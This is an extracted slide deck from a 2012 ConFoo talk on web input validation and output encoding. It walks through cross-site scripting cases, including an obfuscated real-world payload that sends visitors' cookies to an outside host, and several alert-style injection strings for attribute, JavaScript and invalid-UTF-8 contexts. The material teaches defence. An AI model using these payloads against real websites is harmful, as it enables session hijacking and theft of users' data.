  • 22. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 23. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 24. The char codes translate to: <img src=x onerror=(document.location=’ http://standard33.freehostia.com/CS/lg.php?info=’ +escape(document.cookie))> $f was html encoded, but used unquoted as an attribute value. Remember that spaces are never encoded. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
  • 25. Expected a stock symbol, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
  • 26. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 27. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 28. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 29. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 30. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 31. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 32. h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020 onerroru003du0022alert(u0027xssu0027) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 33. h= " > < img src = " foo " onerror = " alert( ’ xss ’ ) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 34. h="><img src="foo" onerror="alert(’xss’) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 35. Expected a hostname, but got something completely different ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
  • 36. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 37. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > That’s 0xe0, start of 3 byte seq ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 38. Dear IE6 <input value=""onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 39. Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
  • 40. So what’s the common theme here? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
  • 41. Should I be Validating Input or Encoding Output? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
  • 42. They solve two different problems, and you need both ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
  • 43. Output Encoding (done automatically by your framework) protects your users from XSS ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
  • 44. Input Validation is a data quality issue ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
  • 45. Is the input you get from a user of the type and range that you expect it to be? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
  • 46. Sometimes it results in back end code injection ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
  • 47. But it always results in bad data ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
  • 48. Bonus Example: This hit me in production yesterday ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
  • 49. regex to check if text was a subdomain of a known domain re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’); re.exec(ref) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
  • 50. Sometimes IE8 will serve requests from a .mht file mhtml:file://C:Usersblah-blah-blah.mht ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
  • 51. I expected the regex to reject this text ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
  • 52. What I got was 100% CPU spent in regex backtracking ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
  • 53. ;( ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 38
  • 54. Unrelated Bonus Example: From a WordPress theme ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
  • 55. <?php $value=htmlspecialchars($_GET[’value’], ENT_QUOTES); ?> <input type="text" value="<?php echo $value ?>" onfocus="if(this.value==’<?php echo $value ?>’) {this.value = ’’;}" /> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
  • 56. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 57. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 58. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’’ +alert(/xss/)+ ’’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 59. I have no idea what was expected here ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
  • 60. Questions? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 43
  • 61. Contact me Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ slideshare.net/bluesmoon ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44